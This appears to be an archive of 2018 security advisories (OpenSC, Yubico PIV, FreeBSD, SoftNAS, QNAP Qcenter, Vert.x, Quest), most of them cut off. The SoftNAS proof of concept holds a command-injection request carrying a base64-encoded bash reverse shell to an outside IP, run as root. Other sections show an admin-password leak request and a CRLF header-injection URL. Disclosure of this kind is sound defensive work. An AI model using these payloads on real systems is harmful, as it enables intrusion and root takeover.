scdebug(card->ctx, SCLOGDEBUGNORMAL, "FILE: %02X%02X%02X%02X\n", oid[0],oid[1],oid[2],oid[3]); if(0 == memcmp(fs->currentPath, oid, 2)) { buf[0] = oid[2]; buf[1] = oid[3]; if(buf[0] == 0x00 && buf[1] == 0x00) continue; /* No directories/null names outside of root */ buf += 2; count+=2; } } return count; } {% endhighlight %} OOB Write in tcosselectfile() = In function tcos_select_file) in file src/libopensc/card-tcos.c a filename is extracted from an APDU response and written into the internal file->name variable. {% highlight c %} case 0x84: memcpy(file->name, d, len); file->namelen = len; break; {% endhighlight %} No check is performed whether the string retrieved from the card fits into the buffer, which could trigger an OOB write. OOB Write in pivvalidategeneral_authentication() In case piv_validate_general_authentication()in src/libopensc/card-piv.c is called with a datalen parameter greater than 4096, an out of bound write occurs. Currently no caller seems to do this. OOB Write in gemsafegetcert_len() = The function gemsafe_get_cert_len() in file src/libopensc/pkcs15-gemsafeV1.c might write beyond the gemsafe_prkeys and gemsafe_cert arrays in case more than 12 containers are stored on the card. {% highlight c %} ind = 2; /* skip length */ while (ibuf[ind] == 0x01) { if (ibuf[ind+1] == 0xFE) { gemsafeprkeys[i].ref = ibuf[ind+4]; sclog(card->ctx, "Key container %d is allocated and uses keyref %d", i+1, gemsafeprkeys[i].ref); ind += 9; } else { gemsafeprkeys[i].label = NULL; gemsafecert[i].label = NULL; sc_log(card->ctx, "Key container %d is unallocated", i+1); ind += 8; } i++; } {% endhighlight %} OOB Write in utilaclto_str() In function util_acl_to_str() in file src/tools/util.c no checks are performed whether the string put together fits into line, which could be abused to trigger limited out of bounds writes. OOB Write in readpublickey() and readprivatekey() = In function read_public_key() in file src/tools/cryptoflex-tool.c the bufsize variable is overwritten with file->size retrieved from the smartcar
X41 D-Sec GmbH Security Advisory X41-2018-001: Multiple Vulnerabilities in Yubico Piv
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2018-001 Multiple Vulnerabilities in Yubico Piv == Overview - Confirmed Affected Versions: 1.5.0 Confirmed Patched Versions: 1.6.0 Vendor: Yubico Vendor URL: https://www.yubico.com/ Vendor Advisory URL: https://www.yubico.com/support/security-advisories Credit: X41 D-Sec GmbH, Eric Sesterhenn Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-001-Yubico-Piv/ Summary and Impact - -- A buffer overflow and an out of bounds memory read were identified in the yubico-piv-tool-1.5.0, these can be triggered by a malicious token. X41 did not perform a full test or audit on the software. Product Description - --- YubiKey 4, YubiKey 4 Nano, YubiKey 4C, YubiKey 4C Nano, and YubiKey NEO provide Smart Card functionality based on the Personal Identity Verification (PIV) interface specified in NIST SP 800-73, “Cryptographic Algorithms and Key Sizes for PIV.” Out of Bounds Write via Malicious APDU == Severity Rating: High Vector: APDU Response CVE: CVE-2018-14779 CWE: 120 CVSS Score: 7.1 (High) CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H Summary and Impact - -- File lib/ykpiv.c contains the following code in function ykpiv_transfer_data() {% highlight c %} if(*outlen + recvlen - 2 > maxout) { fprintf(stderr, "Output buffer to small, wanted to write %lu, max was %lu.", *outlen + recvlen - 2, maxout); } if(outdata) { memcpy(outdata, data, recvlen - 2); outdata += recvlen - 2; *outlen += recv_len - 2; } {% endhighlight %} It is clearly checked whether the buffer is big enough to hold the data copied using memcpy(), but no error handling happens to avoid the memcpy() in such cases. This code path can be triggered with malicious data coming from a smartcard. Workarounds - --- None Out of Bounds Read via malicious APDU = Severity Rating: LOW Vector: APDU Response CVE: CVE-2018-14780 CWE: 125 CVSS Score: 2.2 (Low) CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N Summary and Impact - -- File lib/ykpiv.c contains the following code in function _ykpiv_fetch_object() {% highlight c %} if(sw == SWSUCCESS) { sizet outlen; int offs = ykpivgetlength(data + 1, ); if(offs == 0) { return YKPIVSIZEERROR; } memmove(data, data + 1 + offs, outlen); *len = outlen; return YKPIVOK; } else { return YKPIVGENERICERROR; } {% endhighlight %} In the end, a memmove() occurs with a length retrieved from APDU data. This length is not checked if it is outside of the APDU data retrieved. Therefore the memmove() could copy bytes behind the allocated data buffer into this buffer. Workarounds - --- None Timeline 2018-02-03 Issues found 2018-05-22 Vendor contacted 2018-05-22 Vendor reply 2018-06-05 Requesting technical feedback from the vendor 2018-06-06 Vendor confirms bug 2018-08-01 CVE ID requested 2018-08-02 CVE ID assigned 2018-08-08 Patched version released by vendor 2018-08-11 Advisory released - -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 Geschäftsführer: Markus Vervier -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty2NwACgkQo5Klpg50 CxADgQ//UhL2gZIdimeg1HuJZRz0YcjXMvhGhZoCXOeIcw5+GGrYbnlHX0fwe5eq w9LGLYFDxvoa4ubassR9B+rFVbQ2hg9IVK1rv/VublRRjPZhMyZuGgpKjSPXptn1 /vsQ3SW75SX6c3JKKgyam5tXP/4ke3+1Xpb9W+NpXkhXtk3x78PJDSQMNXdXXWTT WsSYd7icdUI8Z96DkPUntpgbohPu2Si3G16JnHbRYKI0Mjylz6cgVkcYe6whIehq DefhoAFyIrPHPjXHr7Gy4BJnxgyEmuNBfVvNQPGd3YgxadGdozFi733Gnjoo1CAn gJl35rAL794Ww2orISm8oZXUJpTYsi53l4dS4rSFmPnj27bHDSh0s8PcmVP6K0UN 51vC/FO+1J8PRcbZdGp71ePNRYvNNwhTIecY70dn4hX12n/82V466bRGjpLXtNBM 8+0of95VcZQyJFXNNzyTvXMQVA25Lcbo0YkScwaPm6Ob1S1NtzsucojF5TlrXo7e zVAkAS9NqsWTJZVlPQIXdEpQarU8GcPW26BsjB0YpAHvsrywjWbSWLUfI7GFAAhF 25f5NH3bT8ti1wzTnEOs5/0vl9yL5IMVOcggxsT9DbirqVi4qiCPqXg+6v8GzT18 gNTz9w19ZBMehkc400u8PuBzcTlTjiSpdi2IsqaxQoxIpkg8zGw= =fNlG -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-18:08.tcp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:08.tcpSecurity Advisory The FreeBSD Project Topic: Resource exhaustion in TCP reassembly Category: core Module: inet Announced: 2018-08-06 Credits:Juha-Matti Tilli from Aalto University, Department of Communications and Networking and Nokia Bell Labs Affects:All supported versions of FreeBSD. Corrected: 2018-08-06 18:46:09 UTC (stable/11, 11.1-STABLE) 2018-08-06 17:47:47 UTC (releng/11.2, 11.2-RELEASE-p1) 2018-08-06 17:48:46 UTC (releng/11.1, 11.1-RELEASE-p12) 2018-08-06 18:47:03 UTC (stable/10, 10.4-STABLE) 2018-08-06 17:50:40 UTC (releng/10.4, 10.4-RELEASE-p10) CVE Name: CVE-2018-6922 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Transmission Control Protocol (TCP) of the TCP/IP protocol suite provides a connection-oriented, reliable, sequence-preserving data stream service. To transmit a stream of data, TCP breaks the data stream into segments for transmission through the Internet, and reassembles the segments at the receiving side to recreate the data stream. II. Problem Description One of the data structures that holds TCP segments uses an inefficient algorithm to reassemble the data. This causes the CPU time spent on segment processing to grow linearly with the number of segments in the reassembly queue. III. Impact An attacker who has the ability to send TCP traffic to a victim system can degrade the victim system's network performance and/or consume excessive CPU by exploiting the inefficiency of TCP reassembly handling, with relatively small bandwidth cost. IV. Workaround As a workaround, system administrators should configure their systems to only accept TCP connections from trusted end-stations, if it is possible to do so. For systems which must accept TCP connections from untrusted end-stations, the workaround is to limit the size of each reassembly queue. The capability to do that is added by the patches noted in the "Solution" section below. V. Solution As a temporary solution to this problem, these patches limit the size of each TCP connection's reassembly queue. The value is controlled by a sysctl (net.inet.tcp.reass.maxqueuelen), which sets the maximum number of TCP segments that can be outstanding on a session's reassembly queue. This value defaults to 100. Note that setting this value too low could impact the throughput of TCP connections which experience significant loss or reordering. However, the higher this number is set, the more resources can be consumed on TCP reassembly processing. Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 10.4] # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch.asc # gpg --verify tcp-10.patch.asc [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch # fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch.asc # gpg --verify tcp-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r337392 releng/10.4/ r337389 stable/11/r337391 releng/11.1/ r337388 releng/11.2/
[CORE-2018-0009] - SoftNAS Cloud OS Command Injection
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ SoftNAS Cloud OS Command Injection 1. *Advisory Information* Title: SoftNAS Cloud OS Command Injection Advisory ID: CORE-2018-0009 Advisory URL: http://www.coresecurity.com/advisories/softnas-cloudnas-OS-command-injection Date published: 2018-07-26 Date of last update: 2018-05-28 Vendors contacted: SoftNAS Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-14417 3. *Vulnerability Description* SoftNAS' website states that: [1] SoftNAS Cloud is a software-defined NAS filer delivered as a virtual storage appliance that runs within public, private or hybrid clouds. SoftNAS Cloud provides enterprise-grade NAS capabilities, including encryption, snapshots, rapid rollbacks, and cross-zone high-availability with automatic failover. A command injection vulnerability was found in the web administration console. In particular, snserv script did not sanitize some input parameters before executing a system command. 4. *Vulnerable Packages* . SoftNAS Cloud versions prior to 4.0.3 Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* SoftNAS released SoftNAS Cloud 4.0.3 that addresses the reported vulnerability. The software update can be performed via the StorageCenter admin UI in the product. For more information on the updating process see: https://www.softnas.com/docs/softnas/v3/html/updating_to_the_latest_version.html. In addition, SoftNAS published the following release note: https://docs.softnas.com/display/SD/Release+Notes 6. *Credits* The vulnerability was discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Check and execute update functionality abuse leading to command execution* [CVE-2018-14417] The 'recentVersion' parameter from the snserv endpoint is vulnerable to OS Command Injection when check and execute update operations are performed. This endpoint has no authentication/session verification. Therefore, it is possible for an unauthenticated attacker to execute malicious code in the target server. As the WebServer runs a Sudoer user (apache), the malicious code can be executed with root permissions. The following part of the /etc/sudoers file shows the apache user capabilities. /- User_Alias APACHE = apache # Once SoftNAS UI is operational, only allow the specific command that require sudo access!! Cmnd_Alias SOFTNAS = ALL APACHE ALL = (ALL) NOPASSWD: SOFTNAS -/ The following proof of concept generates a remote shell on the target system as root: /- GET /softnas/snserver/snserv.php?opcode=checkupdate=executeupdate=3.6aaa.1aa_type=standard=3.6aaa.1aaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash; HTTP/1.1 Host: 10.2.45.208 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.2.45.208/softnas/applets/update/ X-Requested-With: XMLHttpRequest Connection: close -/ As can be seen in the former request the payload had to be base64 encoded as some special characters were not being properly decoded. 8. *Report Timeline* 2018-05-29: Core Security sent an initial notification to SoftNAS, including a draft advisory. 2018-05-31: SoftNAS confirmed the reported vulnerability and informed they were working on a plan to fix the issue. 2018-05-31: Core Security thanked the SoftNAS' reply. 2018-06-15: Core Security requested a status update. 2018-06-26: SoftNAS answered saying the fixed version was scheduled for late July. 2018-06-26: Core Security thanked the update. 2018-07-16: Core Security asked for a status update and requested a solidified release date. 2018-07-16: SoftNAS informed that the new release version were under QA verification and they would have the release date during the week. 2018-07-19: SoftNAS notified Core Security that SoftNAS Cloud 4.0.3 version was already available. 2018-07-19: Core Security thanked SoftNAS's update and set July 26th as the publication date. 2018-07-26: Advisory CORE-2018-0009 published. 9. *References* [1] https://www.softnas.com 10. *About CoreLabs* CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem
[CORE-2018-0006] - QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ QNAP Qcenter Virtual Appliance Multiple Vulnerabilities 1. *Advisory Information* Title: QNAP Qcenter Virtual Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0006 Advisory URL: http://www.coresecurity.com/advisories/qnap-qcenter-multiple-vulnerabilities Date published: 2018-07-11 Date of last update: 2018-07-11 Vendors contacted: QNAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Information Exposure [CWE-200], Command Injection [CWE-77], Command Injection [CWE-77], Command Injection [CWE-77], Command Injection [CWE-77] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-0706, CVE-2018-0707, CVE-2018-0708, CVE-2018-0709, CVE-2018-0710 3. *Vulnerability Description* QNAP's website states that: [1] Q'center Virtual Appliance is a central management platform that enables you to consolidate the management of multiple QNAP NAS. The Q'center web interface gives you the ease-of-use, cost-efficiency, convenience and flexibility to manage multiple NAS, across multiple sites, from any internet browser. The platform's provides centralized web-based administration to manage the following features: - Review HDD S.M.A.R.T. values - Monitor system status - Manage apps and shared folders - Review infographice reports Multiple vulnerabilities were found in the Q'center Virtual Appliance web console that would allow an attacker to execute arbitrary commands on the system. 4. *Vulnerable versions* . Q'center Virtual Appliance Version 1.6.1056 (20170825) . Q'center Virtual Appliance Version 1.6.1075 (20171123) Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* QNAP published the following Security Note: . https://www.qnap.com/en-us/security-advisory/nas-201807-10 6. *Credits* These vulnerabilities were discovered and researched by Ivan Huertas from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* QNAP's Q'center Virtual Appliance web console includes a functionality that would allow an authenticated attacker to elevate privileges on the system. We describe this issue in section 7.1. Sections 7.2, 7.3, 7.4 and 7.5 show different methods to gain command execution. 7.1. *Privilege escalation* [CVE-2018-0706] The application contains an API endpoint that returns information about the accounts defined in the database. The information returned is informative for all the users except for the admin user, which cames with every installation, where an extra field is presented. This extra field (new_password) contains the password defined at installation time for the admin user encoded in base64. Any authenticated user could access this API endpoint and retrieve the admin user's password, therefore being able to login as an administrator. The following proof of concept shows a user with viewer access retrieving the admin's password encoded in base64 in the new_password field. /- GET /qcenter/hawkeye/v1/account?_dc=1519932315271 HTTP/1.1 Host: 192.168.1.178 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: https://192.168.1.178/qcenter/ Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17; DST_ENABLE=False; user=viewer; CMS_SID=IV4P74Y16X; ROLE=1082130432; _ID=5a9847223af7e2034924e7b6; LOGIN_TIME=1519932215818; remember=false Connection: close HTTP/1.1 200 OK Date: Thu, 01 Mar 2018 19:23:43 GMT Server: Apache X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Content-Type: application/json Content-Length: 878 Connection: close { "total_count": 2, "account": [ { "dst_enable": false, "name": "admin", "default": true, "new_password": "YWRtaW5pc3RyYWRvcg==", "authentication": 0, "create_time": { "$date": 1519917983616 }, "role": 4294967295, "timezone_code": 17, "last_login": { "$date": 1519929869797 }, "_id": "5a981b9f3af7e2030c883592", "email": "", "description": "administrator" }, { "dst_enable": false, "name": "viewer", "register_code": "", "authentication": 0, "create_time": { "$date": 1519929122332 }, "role": 1082130432, "timezone_code": 17, "last_login": { "$date": 1519932215818 }, "_id": "5a9847223af7e2034924e7b6", "email": "", "description&
FreeBSD Security Advisory FreeBSD-SA-18:07.lazyfpu
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:07.lazyfpuSecurity Advisory The FreeBSD Project Topic: Lazy FPU State Restore Information Disclosure Category: core Module: kernel Announced: 2018-06-21 Credits:Julian Stecklina from Amazon Germany Thomas Prescher from Cyberus Technology GmbH Zdenek Sojka from SYSGO AG Colin Percival Affects:All supported version of FreeBSD. Corrected: 2018-06-14 18:50:49 UTC (stable/11, 11.2-PRERELEASE) 2018-06-15 13:21:37 UTC (releng/11.2, 11.2-RC3) 2018-06-21 05:17:13 UTC (releng/11.1, 11.1-RELEASE-p11) CVE Name: CVE-2018-3665 Special Note: This advisory only addresses this issue for FreeBSD 11.x on i386 and amd64. We expect to update this advisory to include 10.x in the near future. For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background Modern CPUs have a floating point unit (FPU) which needs to maintain state per thread. One technique is to only save and to only restore the FPU state for a thread when a thread attempts to utilize the FPU. This technique is called Lazy FPU state restore. II. Problem Description A subset of Intel processors can allow a local thread to infer data from another thread through a speculative execution side channel when Lazy FPU state restore is used. III. Impact Any local thread can potentially read FPU state information from other threads running on the host. This could include cryptographic keys when the AES-NI CPU feature is present. IV. Workaround No workaround is available, but non-Intel branded CPUs are not believed to be vulnerable. V. Solution The patch changes from Lazy FPU state restore to Eager FPU state restore. This new technique is the recommended practice from Intel and in some cases can actually increase performance, depending on workload. Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.1] # fetch https://security.FreeBSD.org/patches/SA-18:07/lazyfpu-11.patch # fetch https://security.FreeBSD.org/patches/SA-18:07/lazyfpu-11.patch.asc # gpg --verify lazyfpu-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/11/r335169 releng/11.2/ r335196 releng/11.1/ r335465 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00145.html> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3665> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:07.lazyfpu.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlsrN1hfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cJTLA/+Kt7QLkNCVudaiE+d+VMuC2f1aGhqoyd+36xL9rNsn2ShZhIo+gq1dhXn 2lJiOYCPN5cJkasj1YdP2bSIv25nTcFM
CSNC-2018-021 - Vert.x - HTTP Header Injection
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: Vert.x [1] # CSNC ID: CSNC-2018-021 # Subject: HTTP Header Injection # Risk: Medium # Effect:Remotely exploitable # Author:Lukasz D. (advisor...@compass-security.com) # Date: 12.06.2018 # # Introduction: - Eclipse Vert.x is a tool-kit for building reactive applications on the JVM. Vert.x can be used for simple network utilities, sophisticated modern web applications, HTTP/REST microservices, high volume event processing or a full-blown back-end message-bus applications. Vert.x is used by many different companies from real-time gaming to banking and everything in between. Vert.x does not filter carriage return and line feed characters from values of set HTTP response headers. This allows to manipulate values of the set HTTP headers and to add arbitrary new headers. In particular, issuing a redirection and manipulation of cookies set by the server is possible. Affected: - The following Vert.x versions are vulnerable: - 3.0.0 - 3.5.1 Technical Description: -- The method putHeader(String name, String value) used to set new headers in the HTTP response does not filter carriage return and line feed characters from the header value. If a web application uses a user-provided parameter as a value of the header, then it is possible for a user to add new HTTP headers of his choice. For example, a Vert.x-based web application may use the vulnerable method like this: putHeader("User-Header", foo), where foo is the user-provided parameter. Then: Requesting /vulnerable?foo=bar will add a header: "User-Header: bar". Requesting /vulnerable?foo=bar%0D%0ASet-Cookie:%20mycookie=hello will add a header: "User-Header: bar" and additionally will set a new cookie with name "mycookie" and value "hello". Workaround / Fix: - It needs to be ensured that every header value which is set based on a user-provided parameter does not contain carriage return and line feed characters. Timeline: - 2018-02-22: Vulnerability discovered 2018-04-04: Initial vendor notification 2018-04-04: Initial vendor response 2018-06-04: Patched version released 2018-06-13: Public disclosure References: --- [1]: https://vertx.io/
[CORE-2018-0004] - Quest KACE System Management Appliance Multiple Vulnerabilities
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Quest KACE System Management Appliance Multiple Vulnerabilities 1. *Advisory Information* Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release 2. *Vulnerability Information* Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141 3. *Vulnerability Description* >From Quest KACE's website: "The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement." Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user. Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7. Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability. CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk. We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices. 4. *Vulnerable Packages* . Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148. For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410- 6. *Credits* These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective. Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user. Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication toke
[CORE-2018-0002] - Quest DR Series Disk Backup Multiple Vulnerabilities
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Quest DR Series Disk Backup Multiple Vulnerabilities 1. *Advisory Information* Title: Quest DR Series Disk Backup Multiple Vulnerabilities Advisory ID: CORE-2018-0002 Advisory URL: http://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release 2. *Vulnerability Information* Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11143, CVE-2018-11144, CVE-2018-11145, CVE-2018-11146, CVE-2018-11147, CVE-2018-11148, CVE-2018-11149, CVE-2018-11150, CVE-2018-11151, CVE-2018-11152, CVE-2018-11153, CVE-2018-11154, CVE-2018-11155, CVE-2018-11156, CVE-2018-11157, CVE-2018-11158, CVE-2018-11159, CVE-2018-11160, 